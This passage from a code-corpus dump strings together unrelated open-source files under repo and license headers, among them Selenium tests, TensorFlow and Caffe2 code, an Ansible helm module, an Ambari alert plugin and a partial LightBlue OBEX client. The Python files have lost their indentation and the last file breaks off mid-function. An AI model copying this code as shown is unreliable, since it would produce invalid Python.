meta.register(Data("mime_type", 951, _("MIME type"), type=unicode))
meta.register(Data("endian", 952, _("Endianness"), type=unicode))
| gpl-3.0 |
nvoron23/POSTMan-Chrome-Extension | tests/selenium/pmtests/postman_tests.py | 98 | 3507 | from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.select import Select
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from colorama import init
from colorama import Fore, Back, Style
import selenium.webdriver.chrome.service as service
import inspect
import time
import traceback
class PostmanTests:
def __init__(self):
init()
s = service.Service('/Users/asthana/Documents/www/chromedriver') # Optional argument, if not specified will search path.
s.start()
capabilities = {'chrome.switches': ["--load-extension=/Users/asthana/Documents/www/postman/POSTMan-Chrome-Extension/chrome"]}
browser = webdriver.Remote(s.service_url, capabilities)
self.s = s
self.browser = browser
self.load_postman()
self.init_test_title()
self.init_test_indexed_db()
def run(self):
print "\nRunning"
print "---------------"
methods = inspect.getmembers(self, predicate=inspect.ismethod)
allms = []
for method in methods:
name = method[0]
f = method[1]
if name.find("test") == 0:
order = int(name.split("_")[1])
m = {
"order": order,
"method": method[1],
"name": method[0]
}
allms.append(m)
ordered = sorted(allms, key=lambda k: k["order"])
for m in ordered:
try:
result = m["method"]()
except Exception as e:
result = False
print traceback.format_exc()
if result is True:
print Fore.WHITE + Back.GREEN + "[PASSED]" + Fore.RESET + Back.RESET + " %s" % m["name"]
else:
print Fore.WHITE + Back.RED + "[FAILED]" + Fore.RESET + Back.RESET + " %s" % m["name"]
self.browser.quit()
def load_postman(self):
self.browser.get('chrome-extension://ljkndjhokjnonidfaggiacifldihhjmg/index.html')
def set_url_field(self, browser, val):
url_field = browser.find_element_by_id("url")
url_field.clear()
url_field.send_keys(val)
def get_codemirror_value(self, browser):
w = WebDriverWait(browser, 10)
w.until(lambda browser: browser.find_element_by_css_selector("#response-success-container").get_attribute("style").find("block") > 0)
code_data_textarea = browser.find_element_by_css_selector("#response-as-code .CodeMirror")
code_data_value = browser.execute_script("return arguments[0].innerHTML", code_data_textarea)
return code_data_value
def set_code_mirror_raw_value(self, value):
code_data_value = self.browser.execute_script("return pm.request.body.loadRawData(arguments[0])", value)
def init_test_title(self):
assert "Postman" in self.browser.title
def init_test_indexed_db(self):
w = WebDriverWait(self.browser, 10)
w.until(lambda driver: self.browser.find_element_by_css_selector("#sidebar-section-history .empty-message"))
print "\nPostman loaded succesfully."
return True
def reset_request(self):
reset_button = self.browser.find_element_by_id("request-actions-reset")
reset_button.click()
time.sleep(0.5)
| apache-2.0 |
tensorflow/models | research/attention_ocr/python/datasets/fsns_test.py | 1 | 3450 | # Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for FSNS datasets module."""
import collections
import os
import tensorflow as tf
from tensorflow.contrib import slim
from datasets import fsns
from datasets import unittest_utils
from tensorflow.compat.v1 import flags
FLAGS = flags.FLAGS
def get_test_split():
config = fsns.DEFAULT_CONFIG.copy()
config['splits'] = {'test': {'size': 5, 'pattern': 'fsns-00000-of-00001'}}
return fsns.get_split('test', dataset_dir(), config)
def dataset_dir():
return os.path.join(os.path.dirname(__file__), 'testdata/fsns')
class FsnsTest(tf.test.TestCase):
def test_decodes_example_proto(self):
expected_label = range(37)
expected_image, encoded = unittest_utils.create_random_image(
'PNG', shape=(150, 600, 3))
serialized = unittest_utils.create_serialized_example({
'image/encoded': [encoded],
'image/format': [b'PNG'],
'image/class':
expected_label,
'image/unpadded_class':
range(10),
'image/text': [b'Raw text'],
'image/orig_width': [150],
'image/width': [600]
})
decoder = fsns.get_split('train', dataset_dir()).decoder
with self.test_session() as sess:
data_tuple = collections.namedtuple('DecodedData', decoder.list_items())
data = sess.run(data_tuple(*decoder.decode(serialized)))
self.assertAllEqual(expected_image, data.image)
self.assertAllEqual(expected_label, data.label)
self.assertEqual([b'Raw text'], data.text)
self.assertEqual([1], data.num_of_views)
def test_label_has_shape_defined(self):
serialized = 'fake'
decoder = fsns.get_split('train', dataset_dir()).decoder
[label_tf] = decoder.decode(serialized, ['label'])
self.assertEqual(label_tf.get_shape().dims[0], 37)
def test_dataset_tuple_has_all_extra_attributes(self):
dataset = fsns.get_split('train', dataset_dir())
self.assertTrue(dataset.charset)
self.assertTrue(dataset.num_char_classes)
self.assertTrue(dataset.num_of_views)
self.assertTrue(dataset.max_sequence_length)
self.assertTrue(dataset.null_code)
def test_can_use_the_test_data(self):
batch_size = 1
dataset = get_test_split()
provider = slim.dataset_data_provider.DatasetDataProvider(
dataset,
shuffle=True,
common_queue_capacity=2 * batch_size,
common_queue_min=batch_size)
image_tf, label_tf = provider.get(['image', 'label'])
with self.test_session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
with slim.queues.QueueRunners(sess):
image_np, label_np = sess.run([image_tf, label_tf])
self.assertEqual((150, 600, 3), image_np.shape)
self.assertEqual((37, ), label_np.shape)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 |
rajiteh/taiga-back | taiga/projects/attachments/admin.py | 21 | 1362 | # Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib import admin
from django.contrib.contenttypes import generic
from . import models
class AttachmentAdmin(admin.ModelAdmin):
list_display = ["id", "project", "attached_file", "owner", "content_type", "content_object"]
list_display_links = ["id", "attached_file",]
list_filter = ["project", "content_type"]
class AttachmentInline(generic.GenericTabularInline):
model = models.Attachment
fields = ("attached_file", "owner")
extra = 0
admin.site.register(models.Attachment, AttachmentAdmin)
| agpl-3.0 |
mikehankey/fireball_camera | read_frames_fast-mike.py | 1 | 1368 | #!/usr/bin/python3
import numpy as np
from pathlib import Path
import os
import requests
from collections import deque
import multiprocessing
from amscommon import read_config
import datetime
import cv2
import iproc
import time
import syslog
import sys
MORPH_KERNEL = np.ones((10, 10), np.uint8)
def main(orig_video_file):
pipe_parent, pipe_child = multiprocessing.Pipe()
man = multiprocessing.Manager()
shared_dict = man.dict()
shared_dict['done'] = 0
cam_process = multiprocessing.Process(target=cam_loop,args=(pipe_parent, shared_dict, orig_video_file))
cam_process.start()
show_process = multiprocessing.Process(target=show_loop,args=(pipe_child, shared_dict))
show_process.start()
cam_process.join()
show_loop.join()
if shared_dict['done'] == 1:
pipe_child.close()
pipe_parent.close()
def cam_loop(pipe_parent, shared_dict, orig_video_file):
print("cam", orig_video_file)
cap = cv2.VideoCapture(orig_video_file)
fc = 0
while True:
_ , frame = cap.read()
if frame is None:
print ("done")
shared_dict['done'] = 1
#sys.exit(1)
else:
print ("FRAME: ", fc)
pipe_parent.send(frame)
fc = fc + 1
def show_loop(pipe_child, shared_dict):
while True:
frame = pipe_child.recv()
print("show")
file = sys.argv[1]
main(file)
| gpl-3.0 |
pattisdr/osf.io | addons/box/tests/test_models.py | 32 | 1889 | import mock
import unittest
import pytest
from addons.base.tests.models import OAuthAddonNodeSettingsTestSuiteMixin
from addons.base.tests.models import OAuthAddonUserSettingTestSuiteMixin
from addons.box.models import NodeSettings
from addons.box.tests import factories
pytestmark = pytest.mark.django_db
class TestBoxNodeSettings(OAuthAddonNodeSettingsTestSuiteMixin, unittest.TestCase):
full_name = 'Box'
short_name = 'box'
ExternalAccountFactory = factories.BoxAccountFactory
NodeSettingsClass = NodeSettings
NodeSettingsFactory = factories.BoxNodeSettingsFactory
UserSettingsFactory = factories.BoxUserSettingsFactory
def setUp(self):
self.mock_data = mock.patch.object(
NodeSettings,
'_folder_data',
return_value=('12235', '/Foo')
)
self.mock_data.start()
super(TestBoxNodeSettings, self).setUp()
def tearDown(self):
self.mock_data.stop()
super(TestBoxNodeSettings, self).tearDown()
def test_folder_defaults_to_none(self):
node_settings = NodeSettings(user_settings=self.user_settings, owner=factories.ProjectFactory())
node_settings.save()
assert node_settings.folder_id is None
@mock.patch('addons.box.models.Provider.refresh_oauth_key')
def test_serialize_credentials(self, mock_refresh):
mock_refresh.return_value = True
super(TestBoxNodeSettings, self).test_serialize_credentials()
@mock.patch('addons.box.models.UserSettings.revoke_remote_oauth_access', mock.PropertyMock())
def test_complete_has_auth_not_verified(self):
super(TestBoxNodeSettings, self).test_complete_has_auth_not_verified()
class TestBoxUserSettings(OAuthAddonUserSettingTestSuiteMixin, unittest.TestCase):
full_name = 'Box'
short_name = 'box'
ExternalAccountFactory = factories.BoxAccountFactory
| apache-2.0 |
codecollision/Gamedex-Backend | boto/ec2/buyreservation.py | 56 | 3813 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto.ec2
from boto.sdb.db.property import StringProperty, IntegerProperty
from boto.manage import propget
InstanceTypes = ['m1.small', 'm1.large', 'm1.xlarge',
'c1.medium', 'c1.xlarge', 'm2.xlarge',
'm2.2xlarge', 'm2.4xlarge', 'cc1.4xlarge',
't1.micro']
class BuyReservation(object):
def get_region(self, params):
if not params.get('region', None):
prop = StringProperty(name='region', verbose_name='EC2 Region',
choices=boto.ec2.regions)
params['region'] = propget.get(prop, choices=boto.ec2.regions)
def get_instance_type(self, params):
if not params.get('instance_type', None):
prop = StringProperty(name='instance_type', verbose_name='Instance Type',
choices=InstanceTypes)
params['instance_type'] = propget.get(prop)
def get_quantity(self, params):
if not params.get('quantity', None):
prop = IntegerProperty(name='quantity', verbose_name='Number of Instances')
params['quantity'] = propget.get(prop)
def get_zone(self, params):
if not params.get('zone', None):
prop = StringProperty(name='zone', verbose_name='EC2 Availability Zone',
choices=self.ec2.get_all_zones)
params['zone'] = propget.get(prop)
def get(self, params):
self.get_region(params)
self.ec2 = params['region'].connect()
self.get_instance_type(params)
self.get_zone(params)
self.get_quantity(params)
if __name__ == "__main__":
obj = BuyReservation()
params = {}
obj.get(params)
offerings = obj.ec2.get_all_reserved_instances_offerings(instance_type=params['instance_type'],
availability_zone=params['zone'].name)
print '\nThe following Reserved Instances Offerings are available:\n'
for offering in offerings:
offering.describe()
prop = StringProperty(name='offering', verbose_name='Offering',
choices=offerings)
offering = propget.get(prop)
print '\nYou have chosen this offering:'
offering.describe()
unit_price = float(offering.fixed_price)
total_price = unit_price * params['quantity']
print '!!! You are about to purchase %d of these offerings for a total of $%.2f !!!' % (params['quantity'], total_price)
answer = raw_input('Are you sure you want to do this? If so, enter YES: ')
if answer.strip().lower() == 'yes':
offering.purchase(params['quantity'])
else:
print 'Purchase cancelled'
| bsd-3-clause |
baruch/diskscan | libscsicmd/structs/ata_struct_2_h.py | 1 | 2491 | #!/usr/bin/env python
import sys
import yaml
def emit_func_bit(name, field, params):
bit_params = dict(name=name, field=field, word=int(params[0]), bit=int(params[1]))
print("""static inline bool ata_get_%(name)s_%(field)s(const unsigned char *buf) {
ata_word_t val = ata_get_word(buf, %(word)d);
return val & (1 << %(bit)d);
}
""" % bit_params)
def emit_func_bits(name, field, params):
bit_params = dict(name=name, field=field, word=int(params[0]), start_bit=int(params[1]), end_bit=int(params[2]))
print("""static inline unsigned ata_get_%(name)s_%(field)s(const unsigned char *buf) {
ata_word_t val = ata_get_word(buf, %(word)d);
return (val >> %(start_bit)d) & ((1<<(%(end_bit)d - %(start_bit)d + 1)) - 1);
}
""" % bit_params)
def emit_func_string(name, field, params):
bit_params = dict(name=name, field=field, word_start=int(params[0]), word_end=int(params[1]))
print("""static inline void ata_get_%(name)s_%(field)s(const unsigned char *buf, char *out) {
ata_get_string(buf, %(word_start)d, %(word_end)d, out);
}
""" % bit_params)
def emit_func_longword(name, field, params):
bit_params = dict(name=name, field=field, word_start=int(params))
print("""static inline ata_longword_t ata_get_%(name)s_%(field)s(const unsigned char *buf) {
return ata_get_longword(buf, %(word_start)d);
}
""" % bit_params)
def emit_func_qword(name, field, params):
bit_params = dict(name=name, field=field, word_start=int(params))
print("""static inline ata_qword_t ata_get_%(name)s_%(field)s(const unsigned char *buf) {
return ata_get_qword(buf, %(word_start)d);
}
""" % bit_params)
kinds = {
'bit': emit_func_bit,
'bits': emit_func_bits,
'string': emit_func_string,
'longword': emit_func_longword,
'qword': emit_func_qword,
}
def emit_header_single(name, struct):
for field, info in list(struct.items()):
keys = list(info.keys())
assert(len(keys) == 1)
kind = keys[0]
params = info[kind]
kinds[kind](name, field, params)
def emit_header(structs):
for name, struct in list(structs.items()):
emit_header_single(name, struct)
def emit_prefix():
print('/* Generated file, do not edit */')
print('#ifndef ATA_PARSE_H')
print('#define ATA_PARSE_H')
print('#include "ata.h"')
def emit_suffix():
print('#endif')
def convert_def(filename):
f = open(filename)
structs = yaml.load(f)
f.close()
emit_header(structs)
if __name__ == '__main__':
emit_prefix()
filenames = sys.argv[1:]
for filename in filenames:
convert_def(filename)
emit_suffix()
| gpl-3.0 |
ryfeus/lambda-packs | pytorch/source/caffe2/python/layers/blob_weighted_sum.py | 1 | 2364 | ## @package BlobWeightedSum
# Module caffe2.python.layers.blob_weighted_sum
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import schema
from caffe2.python.layers.layers import ModelLayer
class BlobWeightedSum(ModelLayer):
"""
This layer implements the weighted sum:
weighted element-wise sum of input blobs.
"""
def __init__(
self,
model,
input_record,
init_weights=None,
weight_optim=None,
name='blob_weighted_sum',
**kwargs
):
super(BlobWeightedSum, self).__init__(model, name, input_record, **kwargs)
self.blobs = self.input_record.field_blobs()
self.num_weights = len(self.blobs)
assert self.num_weights > 1, (
"BlobWeightedSum expects more than one input blobs"
)
assert len(input_record.field_types()[0].shape) > 0, (
"BlobWeightedSum expects limited dimensions of the input tensor"
)
assert all(
input_record.field_types()[0].shape == input_record.field_types()[i].shape
for i in range(1, self.num_weights)
), "Shape of input blobs should be the same shape {}".format(
input_record.field_types()[0].shape
)
if init_weights:
assert self.num_weights == len(init_weights), (
"the size of init_weights should be the same as input blobs, "
"expects {}, got {}".format(self.num_weights, len(init_weights))
)
else:
init_weights = [1.0] * self.num_weights
self.weights = [
self.create_param(
param_name="w_{}".format(idx),
shape=[1],
initializer=('ConstantFill', {'value': float(init_weights[idx])}),
optimizer=weight_optim
) for idx in range(self.num_weights)
]
self.output_schema = schema.Scalar(
input_record.field_types()[0],
self.get_next_blob_reference('blob_weighted_sum_out')
)
def add_ops(self, net):
net.WeightedSum(
[x for pair in zip(self.blobs, self.weights) for x in pair],
self.output_schema(),
grad_on_w=True,
)
| mit |
andmos/ansible | lib/ansible/modules/cloud/misc/helm.py | 50 | 5389 | #!/usr/bin/python
# (c) 2016, Flavio Percoco <flavio@redhat.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: helm
short_description: Manages Kubernetes packages with the Helm package manager
version_added: "2.4"
author: "Flavio Percoco (@flaper87)"
description:
- Install, upgrade, delete and list packages with the Helm package manager.
requirements:
- "pyhelm"
- "grpcio"
options:
host:
description:
- Tiller's server host.
default: "localhost"
port:
description:
- Tiller's server port.
default: 44134
namespace:
description:
- Kubernetes namespace where the chart should be installed.
default: "default"
name:
description:
- Release name to manage.
state:
description:
- Whether to install C(present), remove C(absent), or purge C(purged) a package.
choices: ['absent', 'purged', 'present']
default: "present"
chart:
description: |
A map describing the chart to install. See examples for available options.
default: {}
values:
description:
- A map of value options for the chart.
default: {}
disable_hooks:
description:
- Whether to disable hooks during the uninstall process.
type: bool
default: 'no'
'''
RETURN = ''' # '''
EXAMPLES = '''
- name: Install helm chart
helm:
host: localhost
chart:
name: memcached
version: 0.4.0
source:
type: repo
location: https://kubernetes-charts.storage.googleapis.com
state: present
name: my-memcached
namespace: default
- name: Uninstall helm chart
helm:
host: localhost
state: absent
name: my-memcached
- name: Install helm chart from a git repo
helm:
host: localhost
chart:
source:
type: git
location: https://github.com/user/helm-chart.git
state: present
name: my-example
namespace: default
- name: Install helm chart from a git repo specifying path
helm:
host: localhost
chart:
source:
type: git
location: https://github.com/helm/charts.git
path: stable/memcached
state: present
name: my-memcached
namespace: default
'''
try:
import grpc
from pyhelm import tiller
from pyhelm import chartbuilder
HAS_PYHELM = True
except ImportError as exc:
HAS_PYHELM = False
from ansible.module_utils.basic import AnsibleModule
def install(module, tserver):
changed = False
params = module.params
name = params['name']
values = params['values']
chart = module.params['chart']
namespace = module.params['namespace']
chartb = chartbuilder.ChartBuilder(chart)
r_matches = (x for x in tserver.list_releases()
if x.name == name and x.namespace == namespace)
installed_release = next(r_matches, None)
if installed_release:
if installed_release.chart.metadata.version != chart['version']:
tserver.update_release(chartb.get_helm_chart(), False,
namespace, name=name, values=values)
changed = True
else:
tserver.install_release(chartb.get_helm_chart(), namespace,
dry_run=False, name=name,
values=values)
changed = True
return dict(changed=changed)
def delete(module, tserver, purge=False):
changed = False
params = module.params
if not module.params['name']:
module.fail_json(msg='Missing required field name')
name = module.params['name']
disable_hooks = params['disable_hooks']
try:
tserver.uninstall_release(name, disable_hooks, purge)
changed = True
except grpc._channel._Rendezvous as exc:
if 'not found' not in str(exc):
raise exc
return dict(changed=changed)
def main():
"""The main function."""
module = AnsibleModule(
argument_spec=dict(
host=dict(type='str', default='localhost'),
port=dict(type='int', default=44134),
name=dict(type='str', default=''),
chart=dict(type='dict'),
state=dict(
choices=['absent', 'purged', 'present'],
default='present'
),
# Install options
values=dict(type='dict'),
namespace=dict(type='str', default='default'),
# Uninstall options
disable_hooks=dict(type='bool', default=False),
),
supports_check_mode=True)
if not HAS_PYHELM:
module.fail_json(msg="Could not import the pyhelm python module. "
"Please install `pyhelm` package.")
host = module.params['host']
port = module.params['port']
state = module.params['state']
tserver = tiller.Tiller(host, port)
if state == 'present':
rst = install(module, tserver)
if state in 'absent':
rst = delete(module, tserver)
if state in 'purged':
rst = delete(module, tserver, True)
module.exit_json(**rst)
if __name__ == '__main__':
main()
| gpl-3.0 |
arenadata/ambari | contrib/nagios-alerts/plugins/ambari_alerts.py | 5 | 1896 | #!/usr/bin/python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import urllib2
import json
import sys
import base64
try:
host = sys.argv[1]
port = sys.argv[2]
cluster = sys.argv[3]
protocol = sys.argv[4]
login = sys.argv[5]
password = base64.b64decode(sys.argv[6])
name = sys.argv[7]
alerts_url = 'api/v1/clusters/{0}/alerts?fields=Alert/label,Alert/service_name,Alert/name,Alert/text,Alert/state&Alert/name={1}'.format(cluster, name)
url = '{0}://{1}:{2}/{3}'.format(protocol, host, port, alerts_url)
admin_auth = base64.encodestring('%s:%s' % (login, password)).replace('\n', '')
request = urllib2.Request(url)
request.add_header('Authorization', 'Basic %s' % admin_auth)
request.add_header('X-Requested-By', 'ambari')
response = urllib2.urlopen(request)
response_body = response.read()
alert = json.loads(response_body)['items'][0]
state = alert['Alert']['state']
text = alert['Alert']['text']
except Exception as exc:
text = 'Unable to retrieve alert info: %s' % exc
state = 'UNKNOWN'
finally:
print text
exit_code = {
'OK': 0,
'WARNING': 1,
'CRITICAL': 2,
'UNKNOWN': 3,
}.get(state, 3)
sys.exit(exit_code)
| apache-2.0 |
m0sia/lightblue-0.4 | src/mac/_obex.py | 83 | 24385 | # Copyright (c) 2009 Bea Lam. All rights reserved.
#
# This file is part of LightBlue.
#
# LightBlue is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# LightBlue is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
import datetime
import time
import types
import objc
from Foundation import NSObject, NSDate
from _IOBluetooth import OBEXSession, IOBluetoothDevice, \
IOBluetoothRFCOMMChannel
from _LightAquaBlue import BBBluetoothOBEXClient, BBBluetoothOBEXServer, \
BBStreamingInputStream, BBStreamingOutputStream, \
BBMutableOBEXHeaderSet, \
BBLocalDevice
import _lightbluecommon
import _obexcommon
import _macutil
from _obexcommon import OBEXError
# from <IOBluetooth/OBEX.h>
_kOBEXSuccess = 0
_kOBEXGeneralError = -21850
_kOBEXSessionNotConnectedError = -21876
_kOBEXSessionAlreadyConnectedError = -21882
_kOBEXSessionNoTransportError = -21879
_kOBEXSessionTransportDiedError = -21880
_OBEX_FINAL_MASK = 0x80
_HEADER_MASK = 0xc0
_HEADER_UNICODE = 0x00
_HEADER_BYTE_SEQ = 0x40
_HEADER_1BYTE = 0x80
_HEADER_4BYTE = 0xc0
# public attributes
__all__ = ("OBEXClient", "sendfile", "recvfile")
_obexerrorcodes = { 0: "no error", -21850: "general error", -21851: "no resources", -21852: "operation not supported", -21853: "internal error", -21854: "bad argument", -21855: "timeout", -21856: "bad request", -21857: "cancelled", -21875: "session is busy", -21876: "OBEX session not connected", -21877: "bad request in OBEX session", -21878: "bad response from other party", -21879: "Bluetooth transport not available", -21880: "Bluetooth transport connection died", -21881: "OBEX session timed out", -21882: "OBEX session already connected" }
def errdesc(errorcode):
return _obexerrorcodes.get(errorcode, str(errorcode))
# OBEXSession provides response codes with the final bit set, but OBEXResponse
# class expects the response code to not have the final bit set.
def _cutresponsefinalbit(responsecode):
return (responsecode & ~_OBEX_FINAL_MASK)
def _headersdicttoset(headers):
headerset = BBMutableOBEXHeaderSet.alloc().init()
for header, value in headers.items():
if isinstance(header, types.StringTypes):
hid = _obexcommon._HEADER_STRINGS_TO_IDS.get(header.lower())
else:
hid = header
if hid is None:
raise ValueError("unknown header '%s'" % header)
if isinstance(value, datetime.datetime):
value = value.strftime("%Y%m%dT%H%M%S")
mask = hid & _HEADER_MASK
if mask == _HEADER_UNICODE:
if not isinstance(value, types.StringTypes):
raise TypeError("value for '%s' must be string, was %s" %
(str(header), type(value)))
headerset.setValue_forUnicodeHeader_(value, hid)
elif mask == _HEADER_BYTE_SEQ:
try:
value = buffer(value)
except:
raise TypeError("value for '%s' must be string, array or other buffer type, was %s" % (str(header), type(value)))
headerset.setValue_forByteSequenceHeader_(value, hid)
elif mask == _HEADER_1BYTE:
if not isinstance(value, int):
raise TypeError("value for '%s' must be int, was %s" %
(str(header), type(value)))
headerset.setValue_for1ByteHeader_(value, hid)
elif mask == _HEADER_4BYTE:
if not isinstance(value, int) and not isinstance(value, long):
raise TypeError("value for '%s' must be int, was %s" %
(str(header), type(value)))
headerset.setValue_for4ByteHeader_(value, hid)
if not headerset.containsValueForHeader_(hid):
raise ValueError("cannot set OBEX header value for '%s'" % header)
return headerset
# returns in { header-id: value } form.
def _headersettodict(headerset):
headers = {}
for number in headerset.allHeaders():
hid = number.unsignedCharValue()
mask = hid & _HEADER_MASK
if mask == _HEADER_UNICODE:
value = headerset.valueForUnicodeHeader_(hid)
elif mask == _HEADER_BYTE_SEQ:
value = headerset.valueForByteSequenceHeader_(hid)[:]
if hid == 0x42: # type
if len(value) > 0 and value[-1] == '\0':
value = value[:-1] # remove null byte
elif hid == 0x44: # time iso-8601 string
value = _obexcommon._datetimefromstring(value)
elif mask == _HEADER_1BYTE:
value = headerset.valueFor1ByteHeader_(hid)
elif mask == _HEADER_4BYTE:
value = headerset.valueFor4ByteHeader_(hid)
headers[hid] = value
return headers
class OBEXClient(object):
__doc__ = _obexcommon._obexclientclassdoc
def __init__(self, address, channel):
if not _lightbluecommon._isbtaddr(address):
raise TypeError("address '%s' is not a valid bluetooth address"
% address)
if not type(channel) == int:
raise TypeError("channel must be int, was %s" % type(channel))
if channel < 0:
raise ValueError("channel cannot be negative")
self.__serveraddr = (address, channel)
self.__busy = False
self.__client = None
self.__obexsession = None # for testing
#BBBluetoothOBEXClient.setDebug_(True)
def connect(self, headers={}):
if self.__client is None:
if not BBLocalDevice.isPoweredOn():
raise OBEXError(_kOBEXSessionNoTransportError,
"Bluetooth device not available")
self.__delegate = _BBOBEXClientDelegate.alloc().initWithCallback_(
self._finishedrequest)
self.__client = BBBluetoothOBEXClient.alloc().initWithRemoteDeviceAddress_channelID_delegate_(
_macutil.createbtdevaddr(self.__serveraddr[0]),
self.__serveraddr[1], self.__delegate)
if self.__obexsession is not None:
self.__client.performSelector_withObject_("setOBEXSession:",
self.__obexsession)
self.__reset()
headerset = _headersdicttoset(headers)
r = self.__client.sendConnectRequestWithHeaders_(headerset)
if r != _kOBEXSuccess:
self.__closetransport()
raise OBEXError(r, "error starting Connect request (%s)" %
errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
self.__closetransport()
raise OBEXError(self.__error, "error during Connect request (%s)" %
errdesc(self.__error))
resp = self.__getresponse()
if resp.code != _obexcommon.OK:
self.__closetransport()
return resp
def disconnect(self, headers={}):
self.__checkconnected()
self.__reset()
try:
headerset = _headersdicttoset(headers)
r = self.__client.sendDisconnectRequestWithHeaders_(headerset)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting Disconnect request (%s)" %
errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error,
"error during Disconnect request (%s)" %
errdesc(self.__error))
finally:
# close channel regardless of disconnect result
self.__closetransport()
return self.__getresponse()
def put(self, headers, fileobj):
if not hasattr(fileobj, "read"):
raise TypeError("file-like object must have read() method")
self.__checkconnected()
self.__reset()
headerset = _headersdicttoset(headers)
self.fileobj = fileobj
self.__fileobjdelegate = _macutil.BBFileLikeObjectReader.alloc().initWithFileLikeObject_(fileobj)
self.instream = BBStreamingInputStream.alloc().initWithDelegate_(self.__fileobjdelegate)
self.instream.open()
r = self.__client.sendPutRequestWithHeaders_readFromStream_(
headerset, self.instream)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting Put request (%s)" % errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error, "error during Put request (%s)" %
errdesc(self.__error))
return self.__getresponse()
def delete(self, headers):
self.__checkconnected()
self.__reset()
headerset = _headersdicttoset(headers)
r = self.__client.sendPutRequestWithHeaders_readFromStream_(headerset,
None)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting Delete request (%s)" %
errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error, "error during Delete request (%s)" %
errdesc(self.__error))
return self.__getresponse()
def get(self, headers, fileobj):
if not hasattr(fileobj, "write"):
raise TypeError("file-like object must have write() method")
self.__checkconnected()
self.__reset()
headerset = _headersdicttoset(headers)
delegate = _macutil.BBFileLikeObjectWriter.alloc().initWithFileLikeObject_(fileobj)
outstream = BBStreamingOutputStream.alloc().initWithDelegate_(delegate)
outstream.open()
r = self.__client.sendGetRequestWithHeaders_writeToStream_(
headerset, outstream)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting Get request (%s)" % errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error, "error during Get request (%s)" %
errdesc(self.__error))
return self.__getresponse()
def setpath(self, headers, cdtoparent=False, createdirs=False):
self.__checkconnected()
self.__reset()
headerset = _headersdicttoset(headers)
r = self.__client.sendSetPathRequestWithHeaders_changeToParentDirectoryFirst_createDirectoriesIfNeeded_(headerset, cdtoparent, createdirs)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting SetPath request (%s)" %
errdesc(r))
_macutil.waituntil(self._done)
